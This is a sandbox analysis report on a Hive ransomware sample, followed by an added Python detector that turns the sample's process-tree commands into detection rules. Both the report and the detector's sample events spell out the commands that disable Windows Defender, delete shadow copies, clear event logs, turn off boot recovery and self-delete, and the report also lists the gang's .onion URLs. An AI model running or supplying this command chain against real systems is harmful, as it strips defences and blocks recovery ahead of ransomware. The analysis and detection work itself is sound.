Analysis
- max time kernel: 117s
- max time network: 16s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 15:06

Static task: static1

Behavioral task: behavioral1
- Sample: d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
- Resource: win7-en-20211208

Behavioral task: behavioral2
- Sample: d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
- Resource: win10-en-20211208

General
- Target: d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
- Size: 3.8MB
- MD5: 2a356b6024179ed7b7153fb7d92c2b44
- SHA1: 417799bfed158276d7fabe92fdaf8c53c642c77b
- SHA256: d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f
- SHA512: 9947bb69a7099993b6e4cdc50375515557c6402d247fc661212e7ae84b836f6fe9f226b5bef7140efab91d8eea8f7d329c79e9f627b24b087838668c054d74b8

Malware Config
Extracted
- Path: C:\Bdfn_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2056)
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 592), bcdedit.exe (PID 1976)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1824)
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: notepad.exe (PID 2520)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2088), powershell.exe (PID 2176), d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe (PID 944)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token privileges adjusted, per PID):
  - wevtutil.exe (PID 1940): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 1276): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 1528): SeSecurityPrivilege, SeBackupPrivilege
  - wmic.exe (PID 1272): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  - wmic.exe (PID 884): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and image -> target PID and image):
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 468 net.exe
  - 468 net.exe -> 1036 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 564 net.exe
  - 564 net.exe -> 1616 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1860 net.exe
  - 1860 net.exe -> 812 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 624 net.exe
  - 624 net.exe -> 1004 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1168 net.exe
  - 1168 net.exe -> 1320 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1640 net.exe
  - 1640 net.exe -> 1632 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1460 net.exe
  - 1460 net.exe -> 1392 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1896 net.exe
  - 1896 net.exe -> 1284 net1.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1288 sc.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1756 sc.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1948 sc.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1244 sc.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 1008 sc.exe
  - 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -> 892 sc.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe (PID 944)
  Command line: "C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 468): net.exe stop "NetMsmqActivator" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1036): C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - C:\Windows\system32\net.exe (PID 564): net.exe stop "SamSs" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1616): C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\system32\net.exe (PID 1860): net.exe stop "SDRSVC" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 812): C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\system32\net.exe (PID 624): net.exe stop "SstpSvc" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1004): C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\system32\net.exe (PID 1168): net.exe stop "UI0Detect" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1320): C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\system32\net.exe (PID 1640): net.exe stop "VSS" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1632): C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\system32\net.exe (PID 1460): net.exe stop "wbengine" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1392): C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\system32\net.exe (PID 1896): net.exe stop "WebClient" /y
    Signature: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1284): C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\system32\sc.exe (PID 1288): sc.exe config "NetMsmqActivator" start= disabled
  - C:\Windows\system32\sc.exe (PID 1756): sc.exe config "SamSs" start= disabled
  - C:\Windows\system32\sc.exe (PID 1948): sc.exe config "SDRSVC" start= disabled
  - C:\Windows\system32\sc.exe (PID 1244): sc.exe config "SstpSvc" start= disabled
  - C:\Windows\system32\sc.exe (PID 1008): sc.exe config "UI0Detect" start= disabled
  - C:\Windows\system32\sc.exe (PID 892): sc.exe config "VSS" start= disabled
  - C:\Windows\system32\sc.exe (PID 1924): sc.exe config "wbengine" start= disabled
  - C:\Windows\system32\sc.exe (PID 1608): sc.exe config "WebClient" start= disabled
  - C:\Windows\system32\reg.exe (PID 428): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 572): reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1520): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1864): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1304): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1928): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1524): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1512): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1676): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1068): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1748): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 980): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1044): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1564): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 940): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1712): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\schtasks.exe (PID 720): schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1828): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1772): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\system32\schtasks.exe (PID 660): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1388): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\system32\reg.exe (PID 1740): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1656): reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1560): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\system32\reg.exe (PID 1628): reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1336): reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1060): reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 336): reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1508): reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1284): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1536): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signature: Modifies security service
PID:2028 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:544
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1824 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:592 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1976 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1332
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176 -
C:\Windows\system32\notepad.exenotepad.exe C:\Bdfn_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2520 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"2⤵PID:2528
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2552
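The process tree above is a compact catalogue of the pre-encryption tamper chain: Defender policy keys and services switched off through reg.exe, Defender scheduled tasks and ETW autologgers disabled, definitions removed, shadow copies deleted, event logs cleared, boot recovery disabled, and finally a ping-delay self-delete. The following detector is an added example, not part of the sandbox report or of the Hive sample; it classifies process-creation command lines (as you would pull from Sysmon Event ID 1 or Security 4688) with rules derived from the commands listed here, attributes each hit to the root of its process tree, and reports a root whose subtree hits several distinct categories. The sample events are constructed from the report's commands; the sample process's own PID (1196), its parent PID (1000), the shortened file name sample.exe and the two benign lines are hypothetical. The ATT&CK technique tags are my mapping, not the report's.

```python
"""Classify process command lines against the Defender-tamper / recovery-inhibition
chain shown in the report (added example; not sandbox output or malware code)."""
import re
from collections import defaultdict

# (category, ATT&CK technique, regex over the case-folded, whitespace-collapsed command line)
RULES = [
    ("defender_policy_tamper", "T1562.001",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\software\\policies\\microsoft\\windows defender.*'
                r'/v\s+"?(disable\w+|spynetreporting|submitsamplesconsent|mpenablepus)"?')),
    ("defender_service_disable", "T1562.001",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\system\\currentcontrolset\\services\\'
                r'(windefend|wdboot|wdfilter|wdnisdrv|wdnissvc|securityhealthservice)"?'
                r'\s+/v\s+"?start"?.*/d\s+"?4"?')),
    ("defender_task_disable", "T1562.001",
     re.compile(r'schtasks(\.exe)?\s+/change\s+/tn\s+"?microsoft\\windows\\'
                r'(windows defender|exploitguard).*/disable')),
    ("defender_etw_disable", "T1562.006",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\'
                r'defender\w+logger"?\s+/v\s+"?start"?.*/d\s+"?0"?')),
    ("defender_cmdlet_disable", "T1562.001",
     re.compile(r'set-mppreference\s+-disable\w+\s+\$true')),
    ("defender_definitions_removed", "T1562.001",
     re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions')),
    ("shadow_copy_delete", "T1490",
     re.compile(r'(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)')),
    ("boot_recovery_disable", "T1490",
     re.compile(r'bcdedit(\.exe)?\s+/set\s+\{default\}\s+'
                r'(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
    ("event_log_clear", "T1070.001",
     re.compile(r'wevtutil(\.exe)?\s+cl\s+(system|security|application)')),
    ("self_delete", "T1070.004",
     re.compile(r'ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s+&&\s+del\s+')),
]


def classify(command_line):
    """Return every (category, technique) whose rule matches one command line."""
    cl = " ".join(command_line.lower().split())
    return [(cat, tech) for cat, tech, rx in RULES if rx.search(cl)]


def root_of(pid, parent_of):
    """Walk up parent PIDs until the parent is not itself an observed process."""
    while parent_of.get(pid) in parent_of:
        pid = parent_of[pid]
    return pid


def correlate(events, min_categories=3):
    """Attribute hits to the root of each process tree; report roots whose subtree
    hits at least min_categories distinct categories (a single reg.exe is noise,
    reg + vssadmin + wevtutil under one parent is a ransomware staging chain)."""
    parent_of = {pid: ppid for pid, ppid, _, _ in events}
    chains = defaultdict(dict)
    for pid, ppid, image, cl in events:
        root = root_of(pid, parent_of)
        for cat, tech in classify(cl):
            chains[root].setdefault(cat, (tech, pid, cl))  # first sighting per category
    return {root: cats for root, cats in chains.items() if len(cats) >= min_categories}


SAMPLE_PID = 1196  # hypothetical: the report does not list the sample's own PID here
SAMPLE_EVENTS = [  # (pid, ppid, image, command_line), constructed from the report's process tree
    (SAMPLE_PID, 1000, r"C:\Users\Admin\AppData\Local\Temp\sample.exe", "sample.exe"),
    (1304, SAMPLE_PID, r"C:\Windows\system32\reg.exe",
     r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f'),
    (1676, SAMPLE_PID, r"C:\Windows\system32\reg.exe",
     r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    (940, SAMPLE_PID, r"C:\Windows\system32\reg.exe",
     r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'),
    (660, SAMPLE_PID, r"C:\Windows\system32\schtasks.exe",
     r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    (2028, SAMPLE_PID, r"C:\Windows\system32\reg.exe",
     r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    (1824, SAMPLE_PID, r"C:\Windows\system32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    (1940, SAMPLE_PID, r"C:\Windows\system32\wevtutil.exe", "wevtutil.exe cl security"),
    (1976, SAMPLE_PID, r"C:\Windows\system32\bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled no"),
    (1332, SAMPLE_PID, r"C:\Windows\system32\cmd.exe",
     r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    (2156, SAMPLE_PID, r"C:\Windows\system32\cmd.exe",
     "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    (2176, 2156, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    (2528, SAMPLE_PID, r"C:\Windows\system32\cmd.exe",
     r'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\sample.exe"'),
    # hypothetical benign admin activity under another parent; must not fire
    (3000, 1000, r"C:\Windows\system32\reg.exe", r'reg.exe query "HKLM\Software\Policies\Microsoft\Windows Defender" /s'),
    (3001, 1000, r"C:\Windows\system32\schtasks.exe",
     r'schtasks.exe /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"'),
]

if __name__ == "__main__":
    for root, cats in correlate(SAMPLE_EVENTS).items():
        print(f"root PID {root}: {len(cats)} tamper categories")
        for cat, (tech, pid, cl) in cats.items():
            print(f"  {tech:<10} {cat:<30} pid={pid}  {cl[:70]}")
```

Run against the constructed events, only the sample's tree is reported, with all ten categories, while the query-only reg.exe and schtasks.exe lines under the other parent match nothing. Grouping by root rather than by immediate parent matters because the sample launches MpCmdRun.exe and powershell.exe through an intermediate cmd.exe, so a per-parent count would split the chain across several PIDs. In production, the same rules should also be applied retrospectively to host state (the policy values, the Start=4 service entries, the disabled tasks) because the reg.exe processes are short-lived and the event log they would have landed in is cleared by wevtutil a few steps later.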
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 9462dca09abeb3961f88cfb6b2d54ca7
SHA1 ab4d8445f852cb514e73f611be5c9f30d28861ca
SHA256 ed6fed4612fa79435fdb285e29629d3d053ad77d2c0727d7aa1b2453a6a9c3fa
SHA512 7ab3f07b129f181d7738a068eb3657cb395863689bffe6c98ea9647948a67f82c44ad66c1907b9cfc8e623edfe8a1a5b149624e2913f6d56dead5bb56235cab4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 04eeccf0e131af62b6301f5b0b0ff47a
SHA1 ba763c47a01a24e326fc2dc49d5ae8e8d294c9fe
SHA256 72af9f971933498fc59abaf6e92d02d85bbb6d58333c645bc0ec5da65ccb375e
SHA512 241a76e6985d1de36c585591afaade412d810799345ed872a211bc7552a37a3473f6a473725ba63510aedb9c710eb13a0216da7920b05c773f6e40ed755133cd